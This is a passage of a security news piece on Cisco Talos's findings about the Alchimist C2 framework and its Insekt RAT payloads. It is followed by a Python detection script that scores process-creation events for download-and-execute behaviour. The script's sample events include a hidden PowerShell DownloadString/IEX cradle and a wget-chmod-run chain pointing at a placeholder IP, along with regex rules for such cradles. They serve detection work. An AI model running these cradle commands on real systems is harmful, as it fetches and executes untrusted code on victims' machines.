The discovery of Alchimist and its assorted family of malware implants comes three months after Talos also detailed another self-contained framework known as Manjusaka, which has been touted as the "Chinese sibling of Sliver and Cobalt Strike."

Even more interestingly, both Manjusaka and Alchimist pack in similar functionalities, despite the differences in the implementation when it comes to the web interfaces.

"The rise of ready-to-go offensive frameworks such as Manjusaka and Alchimist is an indication of the popularity of post-compromise tools," Talos researchers told The Hacker News.

"It is likely that due to the high proliferation and detection rates of existing frameworks such as Cobalt Strike and Sliver, threat actors are developing and adopting novel tools such as Alchimist that support multiple functionalities and communication protocols."

The Alchimist C2 panel further features the ability to generate first-stage payloads, including PowerShell and wget code snippets for Windows and Linux, potentially allowing an attacker to flesh out their infection chains to distribute the Insekt RAT binary. The instructions could then be potentially embedded in a maldoc attached to a phishing email that, when opened, downloads and launches the backdoor on the compromised machine.

Although Alchimist has been utilized in a campaign which involved a mix of Insekt RAT and other open source tools for carrying out post-compromise activities, the threat actor's delivery vehicle remains something of a mystery.

"Since Alchimist is a single-file based ready-to-go C2 framework, it is difficult to attribute its use to a single actor such as the authors, APTs, or crimeware syndicates," Talos said. "The distribution and advertising vector for Alchimist is also unknown - underground forums, marketplaces, or open source distribution such as the case for Manjusaka."
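The article notes that the C2 panel emits PowerShell and wget first-stage snippets and that a maldoc is a plausible delivery vehicle. From the defender's side, the observable that survives regardless of which framework generated the snippet is the process-creation record: a shell or PowerShell launched with a download-and-execute command line, often from an Office parent. The following Python is an added example, not code from the article, Talos, or the Alchimist project; it scores constructed process-creation events against generic download-cradle heuristics and flags those above a threshold. The hostnames, parent processes, and the 198.51.100.10 address are all constructed sample data.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation events. Nothing here comes from the article
# or from any real incident; the IP is from the TEST-NET-2 documentation range.
SAMPLE_EVENTS = [
    {"host": "ws-01", "image": "powershell.exe", "parent": "WINWORD.EXE",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://198.51.100.10/a.ps1')\""},
    {"host": "srv-02", "image": "/bin/sh", "parent": "bash",
     "cmdline": "sh -c \"wget -q http://198.51.100.10/x -O /tmp/x && chmod +x /tmp/x && /tmp/x\""},
    {"host": "ws-03", "image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"host": "srv-04", "image": "/usr/bin/wget", "parent": "bash",
     "cmdline": "wget https://mirror.example.org/package.tar.gz"},
]

# Each rule: (name, weight, compiled pattern). Weights are illustrative and should be
# tuned against a baseline of benign admin activity in the environment being monitored.
RULES = [
    ("ps_download_cradle", 3,
     re.compile(r"(?i)(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient)")),
    ("ps_invoke_expression", 2,
     re.compile(r"(?i)(\bIEX\b|Invoke-Expression)")),
    ("ps_hidden_noprofile", 1,
     re.compile(r"(?i)(-w(indowstyle)?\s+hidden|-nop\b|-noprofile)")),
    ("wget_then_execute", 3,
     re.compile(r"(?i)\b(wget|curl)\b.*(\|\s*(ba)?sh\b|&&\s*chmod\s+\+x|&&\s*/tmp/)")),
]

# Office applications spawning a shell is the classic maldoc signal.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


@dataclass
class Finding:
    host: str
    rules: str
    score: int
    cmdline: str


def score_event(event):
    """Return (score, [rule names]) for one process-creation record."""
    score, hits = 0, []
    for name, weight, pattern in RULES:
        if pattern.search(event["cmdline"]):
            score += weight
            hits.append(name)
    if event["parent"].lower() in OFFICE_PARENTS:
        score += 3
        hits.append("office_parent")
    return score, hits


def scan(events, threshold=3):
    """Return a Finding for every event whose cumulative score meets the threshold."""
    findings = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= threshold:
            findings.append(Finding(ev["host"], "+".join(hits), score, ev["cmdline"]))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host}: score={f.score} rules={f.rules}\n    {f.cmdline}")
```

The plain `-File` invocation and the bare package download score zero, so the threshold separates ordinary administration from a download cradle without relying on any URL or hash. In a real pipeline the same `score_event` would run over Sysmon event ID 1 or auditd `execve` records, and the weights would be calibrated per environment rather than fixed.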